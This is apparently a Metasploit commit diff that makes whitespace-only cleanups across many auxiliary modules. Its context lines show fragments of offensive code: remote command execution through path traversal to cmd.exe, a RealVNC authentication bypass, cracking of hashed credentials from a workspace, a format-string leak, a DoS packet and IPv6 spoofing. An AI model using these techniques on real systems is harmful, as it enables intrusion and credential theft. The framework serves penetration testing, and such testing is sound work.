msftidy on aux modules, see #5749
parent
f35b6c5269
commit
67120d4263
|
@ -56,13 +56,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (res and res.code == 500)
|
||||
|
||||
print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
|
||||
|
||||
|
||||
file = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => '/' + tmpfile,
|
||||
}, 25)
|
||||
|
||||
|
||||
if (file and file.code == 200)
|
||||
print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
|
||||
elsif (file and file.code)
|
||||
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Exploited successfully")
|
||||
else
|
||||
print_status("Exploit failed.")
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("Target appears not vulnerable!")
|
||||
end
|
||||
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
if (res and res.code == 200)
|
||||
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
||||
@files_found << files
|
||||
@files_found << files
|
||||
break
|
||||
elsif (res and res.code)
|
||||
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
||||
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
if (res and res.code == 200)
|
||||
print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
||||
@files_found << files
|
||||
@files_found << files
|
||||
elsif (res and res.code)
|
||||
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
||||
end
|
||||
@ -710,7 +710,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'xp_IsNTAdmin',
|
||||
'xp_mapdown_bitmap'
|
||||
]
|
||||
|
||||
|
||||
query = <<-EOS
|
||||
SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P')
|
||||
AND SYSOBJECTS.ID = SYSPROTECTS.ID
|
||||
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
|
||||
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
|
||||
packet << "\x00" * (143 + exec.length)
|
||||
|
||||
|
||||
print_status("Sending command: #{exec}")
|
||||
sock.put(packet)
|
||||
sock.get_once(-1,0.5)
|
||||
@ -56,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
if (datastore['VERBOSE'])
|
||||
print_status("Connecting to the server...")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
connect()
|
||||
smb_login()
|
||||
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (datastore['VERBOSE'])
|
||||
print_status("Checking for file/folder #{datastore['RPATH']}...")
|
||||
end
|
||||
|
||||
|
||||
if (fd = simple.open("\\#{datastore['RPATH']}", 'o')) # mode is open only - do not create/append/write etc
|
||||
print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
|
||||
fd.close
|
||||
@ -14,7 +14,7 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealVNC NULL Authentication Mode Bypass',
|
||||
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("The vncviewer does not appear to be installed, exiting...")
|
||||
return nil
|
||||
end
|
||||
print_status("Spawning viewer thread...")
|
||||
print_status("Spawning viewer thread...")
|
||||
view = framework.threads.spawn("VncViewerWrapper", false) {
|
||||
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
|
||||
}
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Establishes the connection between the viewier and the remote server
|
||||
client = listener.accept
|
||||
add_socket(client)
|
||||
|
||||
|
||||
# Closes the listener socket as it is no longer needed
|
||||
listener.close
|
||||
|
||||
|
@ -91,9 +91,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
client.puts(serverhello)
|
||||
clienthello = client.get_once
|
||||
s.puts(clienthello)
|
||||
|
||||
|
||||
authmethods = s.read(2)
|
||||
|
||||
|
||||
print_status("Auth methods received. Sending null authentication option to client")
|
||||
client.write("\x01\x01")
|
||||
client.read(1)
|
||||
|
@ -121,11 +121,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
s.put(data)
|
||||
end
|
||||
rescue
|
||||
print_error("Client closed connection")
|
||||
print_error("Client closed connection")
|
||||
closed = true
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if selected[0].include?(s)
|
||||
begin
|
||||
data = s.get_once
|
||||
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
sock.put(runtime)
|
||||
res = sock.get_once()
|
||||
methodid = res[5,4]
|
||||
|
||||
|
||||
exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
|
||||
exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
|
||||
exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd
|
||||
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
|
||||
begin
|
||||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
seed = []
|
||||
|
@ -47,42 +47,42 @@ class Metasploit3 < Msf::Auxiliary
|
|||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
||||
|
||||
# Grab any known passwords out of the john.pot file
|
||||
john_cracked_passwords.values {|v| seed << v }
|
||||
|
||||
|
||||
# Write the seed file
|
||||
wordlist.write( seed.flatten.uniq.join("\n") + "\n" )
|
||||
|
||||
|
||||
print_status("Seeded the password database with #{seed.length} words...")
|
||||
|
||||
|
||||
# Append the standard JtR wordlist as well
|
||||
::File.open(john_wordlist_path, "rb") do |fd|
|
||||
wordlist.write fd.read(fd.stat.size)
|
||||
end
|
||||
|
||||
# Close the wordlist to prevent sharing violations (windows)
|
||||
# Close the wordlist to prevent sharing violations (windows)
|
||||
wordlist.close
|
||||
|
||||
|
||||
# Create a PWDUMP style input file for SMB Hashes
|
||||
smb_hashes = myworkspace.creds.select{|x| x.ptype == "smb_hash" }
|
||||
smb_hashes.each do |cred|
|
||||
hashlist.write( "cred_#{cred[:id]}:#{cred[:id]}:#{cred[:pass]}:::\n" )
|
||||
end
|
||||
hashlist.close
|
||||
|
||||
|
||||
if smb_hashes.length > 0
|
||||
cracked_ntlm = {}
|
||||
cracked_lm = {}
|
||||
added = []
|
||||
|
||||
|
||||
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
||||
|
||||
# Crack this in LANMAN format using various incremntal modes
|
||||
john_crack(hashlist.path, :incremental => "All4", :format => 'lm')
|
||||
john_crack(hashlist.path, :incremental => "Digits5", :format => 'lm')
|
||||
|
||||
|
||||
# Parse cracked passwords and permute LANMAN->NTLM as needed
|
||||
cracked = john_show_passwords(hashlist.path, 'lm')
|
||||
cracked[:users].each_pair do |k,v|
|
||||
|
@ -90,52 +90,52 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if (v[0,7] == "???????" or v[7,7] == "???????")
|
||||
next if not k =~ /^cred_(\d+)/m
|
||||
cid = $1.to_i
|
||||
|
||||
|
||||
cracked_lm[k] = v
|
||||
|
||||
|
||||
cred_find = smb_hashes.select{|x| x[:id] == cid}
|
||||
next if cred_find.length == 0
|
||||
|
||||
|
||||
cred = cred_find.first
|
||||
ntlm = cred.pass.split(":", 2).last
|
||||
done = john_lm_upper_to_ntlm(v, ntlm)
|
||||
cracked_ntlm[k] = done if done
|
||||
end
|
||||
|
||||
|
||||
# Append any cracked values to the wordlist
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked_lm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
tfd.close
|
||||
|
||||
|
||||
# Crack this in NTLM format
|
||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
|
||||
|
||||
|
||||
# Crack this in NTLM format using various incremntal modes
|
||||
john_crack(hashlist.path, :incremental => "All4", :format => 'nt')
|
||||
john_crack(hashlist.path, :incremental => "Digits5", :format => 'nt')
|
||||
|
||||
|
||||
# Parse cracked passwords
|
||||
cracked = john_show_passwords(hashlist.path, 'nt')
|
||||
cracked[:users].each_pair do |k,v|
|
||||
next if cracked_ntlm[k]
|
||||
cracked_ntlm[k] = v
|
||||
cracked_ntlm[k] = v
|
||||
end
|
||||
|
||||
|
||||
# Append any cracked values to the wordlist
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
tfd.close
|
||||
|
||||
|
||||
# Store the cracked results based on user_id => cred.id
|
||||
cracked_ntlm.each_pair do |k,v|
|
||||
next if not k =~ /^cred_(\d+)/m
|
||||
cid = $1.to_i
|
||||
|
||||
|
||||
cred_find = smb_hashes.select{|x| x[:id] == cid}
|
||||
next if cred_find.length == 0
|
||||
cred = cred_find.first
|
||||
|
||||
|
||||
print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
|
||||
report_auth_info(
|
||||
:host => cred.service.host,
|
||||
|
@ -148,9 +148,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# XXX: Enter other hash types here (shadow, etc)
|
||||
|
||||
|
||||
rescue ::Timeout::Error
|
||||
ensure
|
||||
wordlist.close rescue nil
|
||||
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
] ,
|
||||
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
|
||||
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
@wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.close
|
||||
print_status("Cracking MSSQL Hashes")
|
||||
crack("mssql")
|
||||
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def crack(format)
|
||||
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
ltype= "#{format}.hashes"
|
||||
myloots = myworkspace.loots.find(:all, :conditions => ['ltype=?', ltype])
|
||||
|
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, format)
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
report_auth_info(
|
||||
:host => v[1],
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
wordlist.close
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
@ -69,11 +69,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, 'mysql-fast')
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
|
||||
#Save cracked creds and add the passwords back to the wordlist for the next round
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
tfd.write( v[0] + "\n" )
|
||||
report_auth_info(
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:sname => 'mssql',
|
||||
:user => k,
|
||||
:pass => v[0]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
print_status("Trying 'mysql-sha1' Wordlist: #{wordlist.path}")
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
john.each_line{|line| seed << line.chomp}
|
||||
|
||||
return seed
|
||||
|
||||
|
||||
end
|
||||
|
||||
# huh?
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
@wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.close
|
||||
crack("oracle")
|
||||
crack("oracle11g")
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -84,8 +84,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return seed
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def crack(format)
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, format)
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
report_auth_info(
|
||||
:host => v[1],
|
||||
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('passwd', [true, 'The path to the passwd file']),
|
||||
|
@ -48,4 +48,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
@ -25,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module attempts to crack Postgres SQL md5 password hashes.
|
||||
It creates hashes based on information saved in the MSF Database
|
||||
It creates hashes based on information saved in the MSF Database
|
||||
such as hostnames, usernames, passwords, and database schema information.
|
||||
The user can also supply an additional external wordlist if they wish.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('Wordlist', [false, 'The path to an optional Wordlist']),
|
||||
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
myloots.each do |myloot|
|
||||
begin
|
||||
postgres_array = CSV.read(myloot.path).drop(1)
|
||||
rescue
|
||||
rescue
|
||||
print_error("Unable to process #{myloot.path}")
|
||||
end
|
||||
postgres_array.each do |row|
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:user => row[0],
|
||||
:pass => password
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['Munge']
|
||||
mungedseed=[]
|
||||
seed.each do |word|
|
||||
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
|
||||
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
|
||||
mungedseed << munged
|
||||
munged.gsub!(/[eE]/, "3")
|
||||
munged.gsub!(/[tT]/, "7")
|
||||
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
sock.put(sploit + "\r\n\r\n")
|
||||
disconnect
|
||||
|
||||
|
||||
print_status("DoS packet unsuccessful.")
|
||||
rescue ::Rex::ConnectionRefused
|
||||
print_status("Unable to connect to #{rhost}:#{rport}.")
|
||||
@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("FORMAT string length cannot exceed 125 bytes.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + fmt,
|
||||
})
|
||||
|
||||
|
||||
if res.code == 200
|
||||
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
|
||||
print_status("Information leaked: #{$1}")
|
||||
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
open_pcap
|
||||
|
||||
|
||||
p = PacketFu::TCPPacket.new
|
||||
p.ip_daddr = rhost
|
||||
p.ip_saddr = shost
|
||||
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# counts
|
||||
pkt << [1,0,0,0].pack('n*')
|
||||
|
||||
|
||||
if str[0,1] == "."
|
||||
pkt << [str.length].pack('C')
|
||||
end
|
||||
@ -68,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['SSL']
|
||||
proto = "https://"
|
||||
end
|
||||
|
||||
|
||||
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
|
||||
if datastore['UserAgent'] != nil
|
||||
if datastore['UserAgent'].length > 0
|
||||
useragent = datastore['UserAgent']
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host = datastore['RHOST']
|
||||
if datastore['VHOST']
|
||||
if datastore['VHOST'].length > 0
|
||||
host = datastore['VHOST']
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@send_data = {
|
||||
:uri => '',
|
||||
:version => '1.1',
|
||||
|
@ -515,7 +515,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
set_cookie(cookie)
|
||||
print_status("Set cookie:#{cookie}")
|
||||
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies")
|
||||
|
||||
|
||||
response = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL'],
|
||||
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
shost = datastore['SHOST']
|
||||
shost ||= get_ipv4_addr(@interface) if @netifaces
|
||||
raise RuntimeError ,'SHOST should be defined' unless shost
|
||||
|
||||
|
||||
smac = datastore['SMAC']
|
||||
smac ||= get_mac(@interface) if @netifaces
|
||||
raise RuntimeError ,'SMAC should be defined' unless smac
|
||||
@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Send ping
|
||||
print_status("Sending multicast pings...")
|
||||
dmac = "33:33:00:00:00:01"
|
||||
|
||||
|
||||
# Figure out our source address by the link-local interface
|
||||
shost = ipv6_link_address
|
||||
|
||||
|
||||
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def neighbor_discovery(neighs)
|
||||
print_status("Discovering IPv6 addresses for IPv4 nodes...")
|
||||
print_status("")
|
||||
|
||||
|
||||
smac = datastore['SMAC']
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "icmp6"})
|
||||
|
||||
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
p.ipv6_next = 0x3a
|
||||
p.ipv6_saddr = shost
|
||||
p.ipv6_daddr = dhost
|
||||
|
||||
|
||||
payload = router_advertisement_payload
|
||||
payload << opt60_payload(lifetime, prefix)
|
||||
payload << slla_payload(smac)
|
||||
@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
hname = nil
|
||||
|
||||
case pkt[2]
|
||||
|
||||
|
||||
when 53
|
||||
app = 'DNS'
|
||||
ver = nil
|
||||
|
@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
ver = pkt[0].unpack('H*')[0] if not ver
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 137
|
||||
app = 'NetBIOS'
|
||||
|
||||
|
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
|
||||
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 1434
|
||||
app = 'MSSQL'
|
||||
mssql_ping_parse(pkt[0]).each_pair { |k,v|
|
||||
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
|
||||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
com = snmp_comm
|
||||
|
||||
when 5093
|
||||
app = 'Sentinel'
|
||||
@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
hname = nil
|
||||
|
||||
case pkt[2]
|
||||
|
||||
|
||||
when 53
|
||||
app = 'DNS'
|
||||
ver = nil
|
||||
|
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
ver = pkt[0].unpack('H*')[0] if not ver
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 137
|
||||
app = 'NetBIOS'
|
||||
|
||||
|
@ -248,7 +248,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
|
||||
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 1434
|
||||
app = 'MSSQL'
|
||||
mssql_ping_parse(pkt[0]).each_pair { |k,v|
|
||||
|
@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
app = 'SNMP'
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -270,13 +270,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
|
||||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
|
||||
com = snmp_comm
|
||||
|
||||
when 5093
|
||||
app = 'Sentinel'
|
||||
|
||||
when 523
|
||||
|
||||
|
||||
app = 'ibm-db2'
|
||||
inf = db2disco_parse(pkt[0])
|
||||
|
||||
@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Content-Type' => 'application/x-amf',
|
||||
'data' => postrequest
|
||||
}, 25)
|
||||
|
||||
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)
|
||||
print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")
|
||||
elsif (res and res.code == 302 or res.code == 301)
|
||||
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
|
||||
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
|
||||
else
|
||||
print_error("#{res.code} for #{check}")
|
||||
#''
|
||||
@ -15,13 +15,13 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
||||
# Include Cisco utility methods
|
||||
include Msf::Auxiliary::Cisco
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
This module gathers data from a Cisco device (router or switch) with the device manager
|
||||
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
|
||||
authentication.
|
||||
authentication.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/exec/show/version/CR",
|
||||
'method' => 'GET'
|
||||
|
@ -61,11 +61,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
|
||||
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
||||
|
||||
# Report a vulnerability only if no password was specified
|
||||
|
||||
# Report a vulnerability only if no password was specified
|
||||
if datastore['BasicAuthPass'].to_s.length == 0
|
||||
|
||||
report_vuln(
|
||||
|
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
end
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/exec/show/config/CR",
|
||||
'method' => 'GET'
|
||||
|
@ -94,9 +94,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
